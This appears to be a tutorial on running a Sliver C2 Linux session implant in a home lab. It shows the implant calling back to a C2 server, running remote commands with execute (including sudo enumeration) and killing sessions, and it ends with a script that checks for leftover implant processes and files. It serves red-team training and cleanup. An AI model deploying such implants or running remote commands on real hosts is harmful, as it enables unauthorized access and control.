Run a Linux Session
Deploy the Linux session implant to the target host, and run it:
./linsession
Once the implant has been executed, go back to the Sliver Client and run the sessions command to see if the implant has communicated back to the server:
[*] Session 847eb6a2 linsession - 192.168.0.133:47834 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:38:59 EDT
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ============== ========== ================== =========
847eb6a2 http(s) 192.168.0.133:47834 kali-nucbox5 root linux/amd64 [ALIVE]
sliver >
We can now see that the implant was executed, communicated back to the Sliver Server, and it is "ALIVE". Next, run the use <ID> command to start interacting with the target host.
sliver > use 847eb6a2
[*] Active session linsession (847eb6a2-4bbe-4295-91d5-6aa5a4df8256)
sliver (linsession) >
Once you run the use command, you will notice that the Sliver command prompt changes to include the name of the session.
Running the ps command:
sliver (linsession) > ps
Pid Ppid Owner Arch Executable
======= ======= ================== ======== =====================================================================
1 0 root x86_64 /sbin/init
2 0 root kthreadd
3 2 root pool_workqueue_release
To get information about the implant, run the info command.
sliver (linsession) > info
Session ID: 847eb6a2-4bbe-4295-91d5-6aa5a4df8256
Name: linsession
Hostname: kali-nucbox5
UUID: 010987dd-f33d-4be8-b236-fb83f884c62e
Username: root
UID: 0
GID: 0
PID: 28472
OS: linux
Version: Linux kali-nucbox5 6.10.12-amd64
Locale: en-US
Arch: amd64
Active C2: https://192.168.0.120
Remote Address: 192.168.0.133:47834
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Sun Oct 6 11:38:59 EDT 2024 (1m53s ago)
Last Checkin: Sun Oct 6 11:40:49 EDT 2024 (3s ago)
sliver (linsession) >
To run commands on the target host that aren’t supported by Sliver, you can use the execute command. Here is the help page for execute:
sliver (linsession) > help execute
Execute a program on the remote system
Usage:
======
execute [flags] command [arguments...]
Args:
=====
command string command to execute
arguments string list arguments to the command
Flags:
======
-h, --help display help
-S, --ignore-stderr don't print STDERR output
-X, --loot save output as loot
-n, --name string name to assign loot (optional)
-o, --output capture command output
-P, --ppid uint parent process id (optional, Windows only) (default: 0)
-s, --save save output to a file
-E, --stderr string remote path to redirect STDERR to
-O, --stdout string remote path to redirect STDOUT to
-t, --timeout int command timeout in seconds (default: 60)
-T, --token execute command with current token (windows only)
sliver (linsession) >
Example:
sliver (linsession) > execute -o sudo -l
[*] Output:
Matching Defaults entries for steve on kali-nucbox5:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
Runas and Command-specific defaults for steve:
Defaults!/usr/lib/*/libexec/kf5/kdesu_stub !use_pty
User steve may run the following commands on kali-nucbox5:
(ALL : ALL) ALL
(ALL : ALL) NOPASSWD: ALL
sliver (linsession) >
To close the session, simply issue the close command:
sliver (linsession) > close
[!] Lost session 38b90e6c linuxsession - 192.168.0.133:51310 (kali-nucbox5) - linux/amd64 - Thu, 03 Oct 2024 16:52:53 EDT
Once your use of the implant is finished, you can kill the process on the target host, or you can just kill the session in Sliver. Keep in mind that the executable will still be on the target host.
sliver (linsession) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ============== ========== ================== =========
847eb6a2 http(s) 192.168.0.133:47834 kali-nucbox5 root linux/amd64 [ALIVE]
sliver (linsession) > sessions -k 847eb6a2
[!] Lost session 847eb6a2 linsession - 192.168.0.133:47834 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:44:18 EDT
sliver > sessions
[*] No sessions 🙁
sliver >
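Because the executable stays on the target host after the session is killed, it is worth confirming the host's state before closing out the test. The script below is an added example, not part of the original walkthrough or of Sliver: it reports whether any process is still running from a given binary (including one whose file has already been deleted) and whether the file is still on disk. The function names are hypothetical, and the path you pass is assumed to be the absolute, symlink-free location where the implant was deployed.

```shell
#!/bin/sh
# Added example: post-engagement cleanup check for a test implant binary.
# Usage: sh cleanup_check.sh /absolute/path/to/implant   (path is supplied by you)

# Print the PIDs of processes whose executable is the given file, including
# processes that keep running after the file was removed from disk.
implant_pids() {
    target=$1
    for exe in /proc/[0-9]*/exe; do
        # readlink fails for kernel threads and for processes we may not inspect
        link=$(readlink "$exe" 2>/dev/null) || continue
        case $link in
            "$target"|"$target (deleted)")
                pid=${exe#/proc/}
                echo "${pid%/exe}"
                ;;
        esac
    done
}

# Return 0 when nothing is left, 1 when only the file remains on disk,
# 2 when at least one process is still running from that file.
cleanup_status() {
    target=$1
    pids=$(implant_pids "$target")
    if [ -n "$pids" ]; then
        # $pids is left unquoted on purpose so the PIDs print on one line
        echo "still running, PIDs:" $pids
        return 2
    fi
    if [ -e "$target" ]; then
        echo "no process, but file remains: $target"
        return 1
    fi
    echo "clean: $target"
    return 0
}

# Run the check only when a path is given, so the functions can also be sourced.
if [ -n "${1:-}" ]; then
    cleanup_status "$1"
fi
```

Run it as root on the target host so that processes owned by other users are visible; an unprivileged run only sees the caller's own processes.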